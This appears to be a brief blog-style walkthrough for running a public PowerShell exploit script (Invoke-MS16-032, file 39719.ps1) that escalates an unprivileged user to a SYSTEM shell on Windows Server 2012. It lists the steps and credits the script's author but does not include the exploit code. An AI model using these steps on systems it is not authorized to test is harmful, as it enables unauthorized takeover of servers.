Privilege Escalation (EoP) on Windows Server 2012 via PowerShell (PS)

  1. Download this powershell script and save it 39719.ps1.
  2. Open an unprivileged powershell terminal.
  3. Go to the folder location where you saved the script.
  4. Source the script: . .\39719.ps1.
  5. Then type Invoke-MS16-032.
  6. Let the magic happens, you just got a nt authority\system cmd.exe.

I tested it on Windows Server 2012 R2 Datacenter Edition 64 bits but author tested it on others Windows.

You can read more about:

Script infos:

  • Author: Ruben Boonen (@FuzzySec)
  • Blog:
  • License: BSD 3-Clause
  • Required Dependencies: PowerShell v2+
  • Optional Dependencies: None